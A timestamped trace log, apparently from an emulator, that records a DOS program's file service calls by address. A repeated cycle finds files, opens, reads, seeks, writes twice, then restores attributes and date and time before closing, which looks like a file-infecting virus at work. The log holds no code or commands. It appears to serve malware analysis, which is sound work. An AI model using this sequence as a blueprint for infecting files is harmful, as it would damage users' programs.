2018-12-25T12:37:38.822982104Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.825094369Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.835054698Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.838303573Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.850238833Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.858365436Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.866545226Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.868246324Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.871492896Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.87669806Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.878300444Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.881642908Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.887961947Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.88998729Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.898819496Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.90318639Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.915056071Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.92297334Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.932442265Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.934525463Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.937524879Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.942276686Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.945199578Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.948661304Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.954556393Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.958706711Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.967514308Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.970911444Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.983116639Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.991229664Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.998864045Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:39.001878191Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:39.005114797Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:39.009232744Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:39.01176956Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:39.015990046Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:39.022042998Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:39.025262117Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:39.033747197Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:39.037118278Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:39.048433111Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:39.057461622Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:39.065083703Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:39.067043765Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:39.071126276Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:39.080997105Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:39.082933807Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:39.092042041Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:39.098179489Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:39.100319896Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:39.110369602Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:39.114163218Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:39.129296852Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:39.137137902Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:39.14627796Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:39.148639792Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:39.151840818Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:39.155675119Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:39.157200542Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:39.161084476Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:39.167036187Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:39.168731337Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:39.177626207Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:39.181478721Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:39.192384555Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:39.199663264Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:39.203374807Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:39.214654261Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:39.216122221Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:39.225908923Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:39.228614562Z	59	PC: 12b63 \| Change current directory
2018-12-25T12:37:39.233298651Z	59	PC: 12b6f \| Change current directory
2018-12-25T12:37:39.238602366Z	26	PC: 12b57 \| Set disk transfer address